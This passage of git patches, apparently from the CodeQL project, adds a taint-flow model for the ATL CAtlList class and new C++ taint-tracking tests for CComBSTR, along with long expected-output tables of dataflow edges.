atl.cpp:323:24:323:32 | call to FindIndex | atl.cpp:324:24:324:26 | pos | | +| atl.cpp:324:12:324:16 | ref arg list6 | atl.cpp:325:5:325:5 | list6 | | +| atl.cpp:328:27:328:28 | 10 | atl.cpp:328:27:328:29 | call to CAtlList | TAINT | +| atl.cpp:328:27:328:29 | call to CAtlList | atl.cpp:329:18:329:22 | list7 | | +| atl.cpp:328:27:328:29 | call to CAtlList | atl.cpp:330:7:330:11 | list7 | | +| atl.cpp:328:27:328:29 | call to CAtlList | atl.cpp:331:12:331:16 | list7 | | +| atl.cpp:328:27:328:29 | call to CAtlList | atl.cpp:332:5:332:5 | list7 | | +| atl.cpp:329:18:329:22 | ref arg list7 | atl.cpp:330:7:330:11 | list7 | | +| atl.cpp:329:18:329:22 | ref arg list7 | atl.cpp:331:12:331:16 | list7 | | +| atl.cpp:329:18:329:22 | ref arg list7 | atl.cpp:332:5:332:5 | list7 | | +| atl.cpp:329:24:329:38 | call to GetTailPosition | atl.cpp:330:25:330:27 | pos | | +| atl.cpp:330:7:330:11 | ref arg list7 | atl.cpp:331:12:331:16 | list7 | | +| atl.cpp:330:7:330:11 | ref arg list7 | atl.cpp:332:5:332:5 | list7 | | +| atl.cpp:331:12:331:16 | ref arg list7 | atl.cpp:332:5:332:5 | list7 | | +| atl.cpp:335:27:335:28 | 10 | atl.cpp:335:27:335:29 | call to CAtlList | TAINT | +| atl.cpp:335:27:335:29 | call to CAtlList | atl.cpp:336:18:336:22 | list8 | | +| atl.cpp:335:27:335:29 | call to CAtlList | atl.cpp:337:7:337:11 | list8 | | +| atl.cpp:335:27:335:29 | call to CAtlList | atl.cpp:338:12:338:16 | list8 | | +| atl.cpp:335:27:335:29 | call to CAtlList | atl.cpp:339:5:339:5 | list8 | | +| atl.cpp:336:18:336:22 | ref arg list8 | atl.cpp:337:7:337:11 | list8 | | +| atl.cpp:336:18:336:22 | ref arg list8 | atl.cpp:338:12:338:16 | list8 | | +| atl.cpp:336:18:336:22 | ref arg list8 | atl.cpp:339:5:339:5 | list8 | | +| atl.cpp:336:24:336:38 | call to GetTailPosition | atl.cpp:337:26:337:28 | pos | | +| atl.cpp:337:7:337:11 | ref arg list8 | atl.cpp:338:12:338:16 | list8 | | +| atl.cpp:337:7:337:11 | ref arg list8 | atl.cpp:339:5:339:5 | list8 | | +| atl.cpp:338:12:338:16 | ref arg list8 | atl.cpp:339:5:339:5 | list8 | | +| atl.cpp:341:27:341:28 | 10 | atl.cpp:341:27:341:29 | call to CAtlList | TAINT | +| atl.cpp:341:27:341:29 | call to CAtlList | atl.cpp:342:7:342:11 | list9 | | +| atl.cpp:341:27:341:29 | call to CAtlList | atl.cpp:342:19:342:23 | list9 | | +| atl.cpp:341:27:341:29 | call to CAtlList | atl.cpp:343:12:343:16 | list9 | | +| atl.cpp:341:27:341:29 | call to CAtlList | atl.cpp:344:5:344:5 | list9 | | +| atl.cpp:342:7:342:11 | ref arg list9 | atl.cpp:343:12:343:16 | list9 | | +| atl.cpp:342:7:342:11 | ref arg list9 | atl.cpp:344:5:344:5 | list9 | | +| atl.cpp:342:19:342:23 | ref arg list9 | atl.cpp:342:7:342:11 | list9 | | +| atl.cpp:342:19:342:23 | ref arg list9 | atl.cpp:343:12:343:16 | list9 | | +| atl.cpp:342:19:342:23 | ref arg list9 | atl.cpp:344:5:344:5 | list9 | | +| atl.cpp:343:12:343:16 | ref arg list9 | atl.cpp:344:5:344:5 | list9 | | +| atl.cpp:349:24:349:25 | 10 | atl.cpp:349:24:349:26 | call to CAtlList | TAINT | +| atl.cpp:349:24:349:26 | call to CAtlList | atl.cpp:350:10:350:13 | list | | +| atl.cpp:349:24:349:26 | call to CAtlList | atl.cpp:351:5:351:8 | list | | +| atl.cpp:349:24:349:26 | call to CAtlList | atl.cpp:352:10:352:13 | list | | +| atl.cpp:349:24:349:26 | call to CAtlList | atl.cpp:355:24:355:27 | list | | +| atl.cpp:349:24:349:26 | call to CAtlList | atl.cpp:397:3:397:3 | list | | +| atl.cpp:350:10:350:13 | ref arg list | atl.cpp:351:5:351:8 | list | | +| atl.cpp:350:10:350:13 | ref arg list | atl.cpp:352:10:352:13 | list | | +| atl.cpp:350:10:350:13 | ref arg list | atl.cpp:355:24:355:27 | list | | +| atl.cpp:350:10:350:13 | ref arg list | atl.cpp:397:3:397:3 | list | | +| atl.cpp:351:5:351:8 | ref arg list | atl.cpp:352:10:352:13 | list | | +| atl.cpp:351:5:351:8 | ref arg list | atl.cpp:355:24:355:27 | list | | +| atl.cpp:351:5:351:8 | ref arg list | atl.cpp:397:3:397:3 | list | | +| atl.cpp:352:10:352:13 | ref arg list | atl.cpp:355:24:355:27 | list | | +| atl.cpp:352:10:352:13 | ref arg list | atl.cpp:397:3:397:3 | list | | +| atl.cpp:354:25:354:26 | 10 | atl.cpp:354:25:354:27 | call to CAtlList | TAINT | +| atl.cpp:354:25:354:27 | call to CAtlList | atl.cpp:355:5:355:9 | list2 | | +| atl.cpp:354:25:354:27 | call to CAtlList | atl.cpp:356:10:356:14 | list2 | | +| atl.cpp:354:25:354:27 | call to CAtlList | atl.cpp:397:3:397:3 | list2 | | +| atl.cpp:355:5:355:9 | ref arg list2 | atl.cpp:356:10:356:14 | list2 | | +| atl.cpp:355:5:355:9 | ref arg list2 | atl.cpp:397:3:397:3 | list2 | | +| atl.cpp:355:24:355:27 | list | atl.cpp:355:23:355:27 | & ... | | +| atl.cpp:356:10:356:14 | ref arg list2 | atl.cpp:397:3:397:3 | list2 | | +| atl.cpp:358:25:358:26 | 10 | atl.cpp:358:25:358:27 | call to CAtlList | TAINT | +| atl.cpp:358:25:358:27 | call to CAtlList | atl.cpp:359:5:359:9 | list3 | | +| atl.cpp:358:25:358:27 | call to CAtlList | atl.cpp:360:10:360:14 | list3 | | +| atl.cpp:358:25:358:27 | call to CAtlList | atl.cpp:363:24:363:28 | list3 | | +| atl.cpp:358:25:358:27 | call to CAtlList | atl.cpp:397:3:397:3 | list3 | | +| atl.cpp:359:5:359:9 | ref arg list3 | atl.cpp:360:10:360:14 | list3 | | +| atl.cpp:359:5:359:9 | ref arg list3 | atl.cpp:363:24:363:28 | list3 | | +| atl.cpp:359:5:359:9 | ref arg list3 | atl.cpp:397:3:397:3 | list3 | | +| atl.cpp:360:10:360:14 | ref arg list3 | atl.cpp:363:24:363:28 | list3 | | +| atl.cpp:360:10:360:14 | ref arg list3 | atl.cpp:397:3:397:3 | list3 | | +| atl.cpp:362:25:362:26 | 10 | atl.cpp:362:25:362:27 | call to CAtlList | TAINT | +| atl.cpp:362:25:362:27 | call to CAtlList | atl.cpp:363:5:363:9 | list4 | | +| atl.cpp:362:25:362:27 | call to CAtlList | atl.cpp:364:10:364:14 | list4 | | +| atl.cpp:362:25:362:27 | call to CAtlList | atl.cpp:397:3:397:3 | list4 | | +| atl.cpp:363:5:363:9 | ref arg list4 | atl.cpp:364:10:364:14 | list4 | | +| atl.cpp:363:5:363:9 | ref arg list4 | atl.cpp:397:3:397:3 | list4 | | +| atl.cpp:363:24:363:28 | list3 | atl.cpp:363:23:363:28 | & ... | | +| atl.cpp:364:10:364:14 | ref arg list4 | atl.cpp:397:3:397:3 | list4 | | +| atl.cpp:367:27:367:28 | 10 | atl.cpp:367:27:367:29 | call to CAtlList | TAINT | +| atl.cpp:367:27:367:29 | call to CAtlList | atl.cpp:368:18:368:22 | list5 | | +| atl.cpp:367:27:367:29 | call to CAtlList | atl.cpp:368:32:368:36 | list5 | | +| atl.cpp:367:27:367:29 | call to CAtlList | atl.cpp:369:12:369:16 | list5 | | +| atl.cpp:367:27:367:29 | call to CAtlList | atl.cpp:370:5:370:5 | list5 | | +| atl.cpp:368:18:368:22 | ref arg list5 | atl.cpp:369:12:369:16 | list5 | | +| atl.cpp:368:18:368:22 | ref arg list5 | atl.cpp:370:5:370:5 | list5 | | +| atl.cpp:368:24:368:27 | call to Find | atl.cpp:369:24:369:26 | pos | | +| atl.cpp:368:32:368:36 | ref arg list5 | atl.cpp:368:18:368:22 | list5 | | +| atl.cpp:368:32:368:36 | ref arg list5 | atl.cpp:369:12:369:16 | list5 | | +| atl.cpp:368:32:368:36 | ref arg list5 | atl.cpp:370:5:370:5 | list5 | | +| atl.cpp:369:12:369:16 | ref arg list5 | atl.cpp:370:5:370:5 | list5 | | +| atl.cpp:373:27:373:28 | 10 | atl.cpp:373:27:373:29 | call to CAtlList | TAINT | +| atl.cpp:373:27:373:29 | call to CAtlList | atl.cpp:374:7:374:11 | list6 | | +| atl.cpp:373:27:373:29 | call to CAtlList | atl.cpp:375:18:375:22 | list6 | | +| atl.cpp:373:27:373:29 | call to CAtlList | atl.cpp:376:12:376:16 | list6 | | +| atl.cpp:373:27:373:29 | call to CAtlList | atl.cpp:377:5:377:5 | list6 | | +| atl.cpp:374:7:374:11 | ref arg list6 | atl.cpp:375:18:375:22 | list6 | | +| atl.cpp:374:7:374:11 | ref arg list6 | atl.cpp:376:12:376:16 | list6 | | +| atl.cpp:374:7:374:11 | ref arg list6 | atl.cpp:377:5:377:5 | list6 | | +| atl.cpp:375:18:375:22 | ref arg list6 | atl.cpp:376:12:376:16 | list6 | | +| atl.cpp:375:18:375:22 | ref arg list6 | atl.cpp:377:5:377:5 | list6 | | +| atl.cpp:375:24:375:32 | call to FindIndex | atl.cpp:376:24:376:26 | pos | | +| atl.cpp:376:12:376:16 | ref arg list6 | atl.cpp:377:5:377:5 | list6 | | +| atl.cpp:380:27:380:28 | 10 | atl.cpp:380:27:380:29 | call to CAtlList | TAINT | +| atl.cpp:380:27:380:29 | call to CAtlList | atl.cpp:381:18:381:22 | list7 | | +| atl.cpp:380:27:380:29 | call to CAtlList | atl.cpp:382:7:382:11 | list7 | | +| atl.cpp:380:27:380:29 | call to CAtlList | atl.cpp:383:12:383:16 | list7 | | +| atl.cpp:380:27:380:29 | call to CAtlList | atl.cpp:384:5:384:5 | list7 | | +| atl.cpp:381:18:381:22 | ref arg list7 | atl.cpp:382:7:382:11 | list7 | | +| atl.cpp:381:18:381:22 | ref arg list7 | atl.cpp:383:12:383:16 | list7 | | +| atl.cpp:381:18:381:22 | ref arg list7 | atl.cpp:384:5:384:5 | list7 | | +| atl.cpp:381:24:381:38 | call to GetTailPosition | atl.cpp:382:25:382:27 | pos | | +| atl.cpp:382:7:382:11 | ref arg list7 | atl.cpp:383:12:383:16 | list7 | | +| atl.cpp:382:7:382:11 | ref arg list7 | atl.cpp:384:5:384:5 | list7 | | +| atl.cpp:383:12:383:16 | ref arg list7 | atl.cpp:384:5:384:5 | list7 | | +| atl.cpp:387:27:387:28 | 10 | atl.cpp:387:27:387:29 | call to CAtlList | TAINT | +| atl.cpp:387:27:387:29 | call to CAtlList | atl.cpp:388:18:388:22 | list8 | | +| atl.cpp:387:27:387:29 | call to CAtlList | atl.cpp:389:7:389:11 | list8 | | +| atl.cpp:387:27:387:29 | call to CAtlList | atl.cpp:390:12:390:16 | list8 | | +| atl.cpp:387:27:387:29 | call to CAtlList | atl.cpp:391:5:391:5 | list8 | | +| atl.cpp:388:18:388:22 | ref arg list8 | atl.cpp:389:7:389:11 | list8 | | +| atl.cpp:388:18:388:22 | ref arg list8 | atl.cpp:390:12:390:16 | list8 | | +| atl.cpp:388:18:388:22 | ref arg list8 | atl.cpp:391:5:391:5 | list8 | | +| atl.cpp:388:24:388:38 | call to GetTailPosition | atl.cpp:389:26:389:28 | pos | | +| atl.cpp:389:7:389:11 | ref arg list8 | atl.cpp:390:12:390:16 | list8 | | +| atl.cpp:389:7:389:11 | ref arg list8 | atl.cpp:391:5:391:5 | list8 | | +| atl.cpp:390:12:390:16 | ref arg list8 | atl.cpp:391:5:391:5 | list8 | | +| atl.cpp:393:27:393:28 | 10 | atl.cpp:393:27:393:29 | call to CAtlList | TAINT | +| atl.cpp:393:27:393:29 | call to CAtlList | atl.cpp:394:7:394:11 | list9 | | +| atl.cpp:393:27:393:29 | call to CAtlList | atl.cpp:394:19:394:23 | list9 | | +| atl.cpp:393:27:393:29 | call to CAtlList | atl.cpp:395:12:395:16 | list9 | | +| atl.cpp:393:27:393:29 | call to CAtlList | atl.cpp:396:5:396:5 | list9 | | +| atl.cpp:394:7:394:11 | ref arg list9 | atl.cpp:395:12:395:16 | list9 | | +| atl.cpp:394:7:394:11 | ref arg list9 | atl.cpp:396:5:396:5 | list9 | | +| atl.cpp:394:19:394:23 | ref arg list9 | atl.cpp:394:7:394:11 | list9 | | +| atl.cpp:394:19:394:23 | ref arg list9 | atl.cpp:395:12:395:16 | list9 | | +| atl.cpp:394:19:394:23 | ref arg list9 | atl.cpp:396:5:396:5 | list9 | | +| atl.cpp:395:12:395:16 | ref arg list9 | atl.cpp:396:5:396:5 | list9 | | | bsd.cpp:17:11:17:16 | call to source | bsd.cpp:20:18:20:18 | s | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:20:22:20:25 | addr | | | bsd.cpp:18:12:18:15 | addr | bsd.cpp:23:8:23:11 | addr | | From 2b8ef5a8c8c0c464ef97b1cc4c76107a416e85cc Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 11:39:26 +0000 Subject: [PATCH 0727/1267] C++: Add MaD model for 'CAtlList'. --- cpp/ql/lib/ext/CAtlList.model.yml | 25 +++++++++++++++ .../dataflow/taint-tests/atl.cpp | 32 +++++++++---------- 2 files changed, 41 insertions(+), 16 deletions(-) create mode 100644 cpp/ql/lib/ext/CAtlList.model.yml diff --git a/cpp/ql/lib/ext/CAtlList.model.yml b/cpp/ql/lib/ext/CAtlList.model.yml new file mode 100644 index 00000000000..eb59fb8417e --- /dev/null +++ b/cpp/ql/lib/ext/CAtlList.model.yml @@ -0,0 +1,25 @@ +extensions: + - addsTo: + pack: codeql/cpp-all + extensible: summaryModel + data: # namespace, type, subtypes, name, signature, ext, input, output, kind, provenance + - ["", "CAtlList", True, "AddHead", "", "", "Argument[*@0]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CAtlList", True, "AddHeadList", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CAtlList", True, "AddTail", "", "", "Argument[*@0]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CAtlList", True, "AddTailList", "", "", "Argument[*0].Element[@]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CAtlList", True, "FindIndex", "", "", "Argument[0]", "ReturnValue", "taint", "manual"] + - ["", "CAtlList", True, "GetAt", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] + - ["", "CAtlList", True, "GetAt", "", "", "Argument[0]", "ReturnValue[*@]", "taint", "manual"] + - ["", "CAtlList", True, "GetHead", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] + - ["", "CAtlList", True, "GetHeadPosition", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["", "CAtlList", True, "GetNext", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["", "CAtlList", True, "GetPrev", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["", "CAtlList", True, "GetTail", "", "", "Argument[-1].Element[@]", "ReturnValue[*@]", "value", "manual"] + - ["", "CAtlList", True, "GetTailPosition", "", "", "Argument[-1]", "ReturnValue", "taint", "manual"] + - ["", "CAtlList", True, "InsertAfter", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CAtlList", True, "InsertAfter", "", "", "Argument[*@1]", "ReturnValue", "taint", "manual"] + - ["", "CAtlList", True, "InsertBefore", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "value", "manual"] + - ["", "CAtlList", True, "InsertBefore", "", "", "Argument[*@1]", "ReturnValue", "taint", "manual"] + - ["", "CAtlList", True, "SetAt", "", "", "Argument[*@1]", "Argument[-1].Element[@]", "taint", "manual"] + - ["", "CAtlList", True, "SwapElements", "", "", "Argument[0]", "Argument[1]", "taint", "manual"] + - ["", "CAtlList", True, "SwapElements", "", "", "Argument[1]", "Argument[0]", "taint", "manual"] diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index b1231c13c48..fe7a5513ce7 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -297,19 +297,19 @@ void test_CAtlList() { CAtlList list(10); sink(list.GetHead()); list.AddHead(x); - sink(list.GetHead()); // $ MISSING: ir + sink(list.GetHead()); // $ ir CAtlList list2(10); list2.AddHeadList(&list); - sink(list2.GetHead()); // $ MISSING: ir + sink(list2.GetHead()); // $ ir CAtlList list3(10); list3.AddTail(x); - sink(list3.GetHead()); // $ MISSING: ir + sink(list3.GetHead()); // $ ir CAtlList list4(10); list4.AddTailList(&list3); - sink(list4.GetHead()); // $ MISSING: ir + sink(list4.GetHead()); // $ ir { CAtlList list5(10); @@ -321,26 +321,26 @@ void test_CAtlList() { CAtlList list6(10); list6.AddHead(x); auto pos = list6.FindIndex(0); - sink(list6.GetAt(pos)); // $ MISSING: ir + sink(list6.GetAt(pos)); // $ ir } { CAtlList list7(10); auto pos = list7.GetTailPosition(); list7.InsertAfter(pos, x); - sink(list7.GetHead()); // $ MISSING: ir + sink(list7.GetHead()); // $ ir } { CAtlList list8(10); auto pos = list8.GetTailPosition(); list8.InsertBefore(pos, x); - sink(list8.GetHead()); // $ MISSING: ir + sink(list8.GetHead()); // $ ir } { CAtlList list9(10); list9.SetAt(list9.GetHeadPosition(), x); - sink(list9.GetHead()); // $ MISSING: ir + sink(list9.GetHead()); // $ ir } } @@ -349,19 +349,19 @@ void test_CAtlList() { CAtlList list(10); sink(list.GetHead()); list.AddHead(x); - sink(list.GetHead()); // $ MISSING: ir + sink(list.GetHead()); // $ ir CAtlList list2(10); list2.AddHeadList(&list); - sink(list2.GetHead()); // $ MISSING: ir + sink(list2.GetHead()); // $ ir CAtlList list3(10); list3.AddTail(x); - sink(list3.GetHead()); // $ MISSING: ir + sink(list3.GetHead()); // $ ir CAtlList list4(10); list4.AddTailList(&list3); - sink(list4.GetHead()); // $ MISSING: ir + sink(list4.GetHead()); // $ ir { CAtlList list5(10); @@ -373,26 +373,26 @@ void test_CAtlList() { CAtlList list6(10); list6.AddHead(x); auto pos = list6.FindIndex(0); - sink(list6.GetAt(pos)); // $ MISSING: ir + sink(list6.GetAt(pos)); // $ ir } { CAtlList list7(10); auto pos = list7.GetTailPosition(); list7.InsertAfter(pos, x); - sink(list7.GetHead()); // $ MISSING: ir + sink(list7.GetHead()); // $ ir } { CAtlList list8(10); auto pos = list8.GetTailPosition(); list8.InsertBefore(pos, x); - sink(list8.GetHead()); // $ MISSING: ir + sink(list8.GetHead()); // $ ir } { CAtlList list9(10); list9.SetAt(list9.GetHeadPosition(), x); - sink(list9.GetHead()); // $ MISSING: ir + sink(list9.GetHead()); // $ ir } } } From 68ee8da574f56f160d61371f6eac44801c2ae2ad Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Wed, 27 Nov 2024 12:04:29 +0000 Subject: [PATCH 0728/1267] C++: Add failing tests with 'CComBSTR'. --- .../dataflow/taint-tests/atl.cpp | 129 +++++++++++++++++ .../dataflow/taint-tests/localTaint.expected | 130 ++++++++++++++++++ 2 files changed, 259 insertions(+) diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp index fe7a5513ce7..0eb636082e2 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/atl.cpp @@ -396,3 +396,132 @@ void test_CAtlList() { } } } + +struct IUnknown { }; + +struct ISequentialStream : public IUnknown { }; + +struct IStream : public ISequentialStream { }; + +struct CComBSTR { + CComBSTR() throw(); + CComBSTR(const CComBSTR& src); + CComBSTR(int nSize); + CComBSTR(int nSize, LPCOLESTR sz); + CComBSTR(int nSize, LPCSTR sz); + CComBSTR(LPCOLESTR pSrc); + CComBSTR(LPCSTR pSrc); + CComBSTR(CComBSTR&& src) throw(); + ~CComBSTR(); + + HRESULT Append(const CComBSTR& bstrSrc) throw(); + HRESULT Append(wchar_t ch) throw(); + HRESULT Append(char ch) throw(); + HRESULT Append(LPCOLESTR lpsz) throw(); + HRESULT Append(LPCSTR lpsz) throw(); + HRESULT Append(LPCOLESTR lpsz, int nLen) throw(); + HRESULT AppendBSTR(BSTR p) throw(); + HRESULT AppendBytes(const char* lpsz, int nLen) throw(); + HRESULT ArrayToBSTR(const SAFEARRAY* pSrc) throw(); + HRESULT AssignBSTR(const BSTR bstrSrc) throw(); + void Attach(BSTR src) throw(); + HRESULT BSTRToArray(LPSAFEARRAY ppArray) throw(); + unsigned int ByteLength() const throw(); + BSTR Copy() const throw(); + HRESULT CopyTo(BSTR* pbstr) throw(); + + HRESULT CopyTo(VARIANT* pvarDest) throw(); + BSTR Detach() throw(); + void Empty() throw(); + unsigned int Length() const throw(); + bool LoadString(HINSTANCE hInst, UINT nID) throw(); + bool LoadString(UINT nID) throw(); + HRESULT ReadFromStream(IStream* pStream) throw(); + HRESULT ToUpper() throw(); + HRESULT WriteToStream(IStream* pStream) throw(); + + operator BSTR() const throw(); + BSTR* operator&() throw(); + + CComBSTR& operator+= (const CComBSTR& bstrSrc); + CComBSTR& operator+= (const LPCOLESTR pszSrc); + + BSTR m_str; +}; + +LPSAFEARRAY getSafeArray() { + SAFEARRAY* safe = new SAFEARRAY; + safe->pvData = indirect_source(); + return safe; +} + +void test_CComBSTR() { + char* x = indirect_source(); + { + CComBSTR b(x); + sink(b.m_str); // $ MISSING: ir + + CComBSTR b2(b); + sink(b2.m_str); // $ MISSING: ir + } + { + CComBSTR b(10, x); + sink(b.m_str); // $ MISSING: ir + } + { + CComBSTR b(x); + + CComBSTR b2; + sink(b2.m_str); + b2 += b; + sink(b2.m_str); // $ MISSING: ir + + CComBSTR b3; + b3 += x; + sink(b3.m_str); // $ MISSING: ir + sink(static_cast(b3)); // $ MISSING: ir + sink(**&b3); // $ MISSING: ir + + CComBSTR b4; + b4.Append(source()); + sink(b4.m_str); // $ MISSING: ir + + CComBSTR b5; + b5.AppendBSTR(b4.m_str); + sink(b5.m_str); // $ MISSING: ir + + CComBSTR b6; + b6.AppendBytes(x, 10); + sink(b6.m_str); // $ MISSING: ir + + CComBSTR b7; + b7.ArrayToBSTR(getSafeArray()); + sink(b7.m_str); // $ MISSING: ir + + CComBSTR b8; + b8.AssignBSTR(b7.m_str); + sink(b8.m_str); // $ MISSING: ir + + CComBSTR b9; + SAFEARRAY safe; + b9.Append(source()); + b9.BSTRToArray(&safe); + sink(safe.pvData); // $ MISSING: ir + + sink(b9.Copy()); // $ MISSING: ir + } + + wchar_t* w = indirect_source(); + { + CComBSTR b(w); + sink(b.m_str); // $ MISSING: ir + + CComBSTR b2; + b2.Attach(w); + sink(b2.m_str); // $ MISSING: ir + } + { + CComBSTR b(10, w); + sink(b.m_str); // $ MISSING: ir + } +} diff --git a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected index 5c7da7123ad..becba8e527b 100644 --- a/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected +++ b/cpp/ql/test/library-tests/dataflow/taint-tests/localTaint.expected @@ -506,6 +506,136 @@ WARNING: module 'TaintTracking' has been deprecated and may be removed in future | atl.cpp:394:19:394:23 | ref arg list9 | atl.cpp:395:12:395:16 | list9 | | | atl.cpp:394:19:394:23 | ref arg list9 | atl.cpp:396:5:396:5 | list9 | | | atl.cpp:395:12:395:16 | ref arg list9 | atl.cpp:396:5:396:5 | list9 | | +| atl.cpp:453:21:453:33 | new | atl.cpp:454:3:454:6 | safe | | +| atl.cpp:453:21:453:33 | new | atl.cpp:455:10:455:13 | safe | | +| atl.cpp:454:3:454:6 | safe [post update] | atl.cpp:455:10:455:13 | safe | | +| atl.cpp:454:3:454:40 | ... = ... | atl.cpp:454:9:454:14 | pvData [post update] | | +| atl.cpp:454:18:454:38 | call to indirect_source | atl.cpp:454:3:454:40 | ... = ... | | +| atl.cpp:459:13:459:33 | call to indirect_source | atl.cpp:461:16:461:16 | x | | +| atl.cpp:459:13:459:33 | call to indirect_source | atl.cpp:468:20:468:20 | x | | +| atl.cpp:459:13:459:33 | call to indirect_source | atl.cpp:472:16:472:16 | x | | +| atl.cpp:459:13:459:33 | call to indirect_source | atl.cpp:480:11:480:11 | x | | +| atl.cpp:459:13:459:33 | call to indirect_source | atl.cpp:494:20:494:20 | x | | +| atl.cpp:461:16:461:16 | x | atl.cpp:461:16:461:17 | call to CComBSTR | TAINT | +| atl.cpp:461:16:461:17 | call to CComBSTR | atl.cpp:462:10:462:10 | b | | +| atl.cpp:461:16:461:17 | call to CComBSTR | atl.cpp:464:17:464:17 | b | | +| atl.cpp:461:16:461:17 | call to CComBSTR | atl.cpp:466:3:466:3 | b | | +| atl.cpp:462:10:462:10 | b [post update] | atl.cpp:464:17:464:17 | b | | +| atl.cpp:462:10:462:10 | b [post update] | atl.cpp:466:3:466:3 | b | | +| atl.cpp:462:12:462:16 | ref arg m_str | atl.cpp:465:13:465:17 | m_str | | +| atl.cpp:464:17:464:17 | b | atl.cpp:464:17:464:18 | call to CComBSTR | | +| atl.cpp:464:17:464:18 | call to CComBSTR | atl.cpp:465:10:465:11 | b2 | | +| atl.cpp:464:17:464:18 | call to CComBSTR | atl.cpp:466:3:466:3 | b2 | | +| atl.cpp:465:10:465:11 | b2 [post update] | atl.cpp:466:3:466:3 | b2 | | +| atl.cpp:468:16:468:21 | call to CComBSTR | atl.cpp:469:10:469:10 | b | | +| atl.cpp:468:16:468:21 | call to CComBSTR | atl.cpp:470:3:470:3 | b | | +| atl.cpp:469:10:469:10 | b [post update] | atl.cpp:470:3:470:3 | b | | +| atl.cpp:472:16:472:16 | x | atl.cpp:472:16:472:17 | call to CComBSTR | TAINT | +| atl.cpp:472:16:472:17 | call to CComBSTR | atl.cpp:476:11:476:11 | b | | +| atl.cpp:472:16:472:17 | call to CComBSTR | atl.cpp:512:3:512:3 | b | | +| atl.cpp:474:14:474:15 | call to CComBSTR | atl.cpp:475:10:475:11 | b2 | | +| atl.cpp:474:14:474:15 | call to CComBSTR | atl.cpp:476:5:476:6 | b2 | | +| atl.cpp:474:14:474:15 | call to CComBSTR | atl.cpp:477:10:477:11 | b2 | | +| atl.cpp:474:14:474:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b2 | | +| atl.cpp:475:10:475:11 | b2 [post update] | atl.cpp:476:5:476:6 | b2 | | +| atl.cpp:475:10:475:11 | b2 [post update] | atl.cpp:477:10:477:11 | b2 | | +| atl.cpp:475:10:475:11 | b2 [post update] | atl.cpp:512:3:512:3 | b2 | | +| atl.cpp:475:13:475:17 | ref arg m_str | atl.cpp:477:13:477:17 | m_str | | +| atl.cpp:476:5:476:6 | ref arg b2 | atl.cpp:477:10:477:11 | b2 | | +| atl.cpp:476:5:476:6 | ref arg b2 | atl.cpp:512:3:512:3 | b2 | | +| atl.cpp:477:10:477:11 | b2 [post update] | atl.cpp:512:3:512:3 | b2 | | +| atl.cpp:479:14:479:15 | call to CComBSTR | atl.cpp:480:5:480:6 | b3 | | +| atl.cpp:479:14:479:15 | call to CComBSTR | atl.cpp:481:10:481:11 | b3 | | +| atl.cpp:479:14:479:15 | call to CComBSTR | atl.cpp:482:28:482:29 | b3 | | +| atl.cpp:479:14:479:15 | call to CComBSTR | atl.cpp:483:13:483:14 | b3 | | +| atl.cpp:479:14:479:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b3 | | +| atl.cpp:480:5:480:6 | ref arg b3 | atl.cpp:481:10:481:11 | b3 | | +| atl.cpp:480:5:480:6 | ref arg b3 | atl.cpp:482:28:482:29 | b3 | | +| atl.cpp:480:5:480:6 | ref arg b3 | atl.cpp:483:13:483:14 | b3 | | +| atl.cpp:480:5:480:6 | ref arg b3 | atl.cpp:512:3:512:3 | b3 | | +| atl.cpp:480:11:480:11 | x | atl.cpp:480:11:480:11 | call to CComBSTR | TAINT | +| atl.cpp:481:10:481:11 | b3 [post update] | atl.cpp:482:28:482:29 | b3 | | +| atl.cpp:481:10:481:11 | b3 [post update] | atl.cpp:483:13:483:14 | b3 | | +| atl.cpp:481:10:481:11 | b3 [post update] | atl.cpp:512:3:512:3 | b3 | | +| atl.cpp:482:28:482:29 | ref arg b3 | atl.cpp:483:13:483:14 | b3 | | +| atl.cpp:482:28:482:29 | ref arg b3 | atl.cpp:512:3:512:3 | b3 | | +| atl.cpp:483:11:483:14 | * ... | atl.cpp:483:10:483:14 | * ... | TAINT | +| atl.cpp:483:12:483:12 | call to operator& | atl.cpp:483:11:483:14 | * ... | TAINT | +| atl.cpp:483:13:483:14 | ref arg b3 | atl.cpp:512:3:512:3 | b3 | | +| atl.cpp:485:14:485:15 | call to CComBSTR | atl.cpp:486:5:486:6 | b4 | | +| atl.cpp:485:14:485:15 | call to CComBSTR | atl.cpp:487:10:487:11 | b4 | | +| atl.cpp:485:14:485:15 | call to CComBSTR | atl.cpp:490:19:490:20 | b4 | | +| atl.cpp:485:14:485:15 | call to CComBSTR | atl.cpp:512:3:512:3 | b4 | | +| atl.cpp:486:5:486:6 | ref arg b4 | atl.cpp:487:10:487:11 | b4 | | +| atl.cpp:486:5:486:6 | ref arg b4 | atl.cpp:490:19:490:20 | b4 | | +| atl.cpp:486:5:486:6 | ref arg b4 | atl.cpp:512:3:512:3 | b4 | | +| atl.cpp:487:10:487:11 | b4 [post update] | atl.cpp:490:19:490:20 | b4 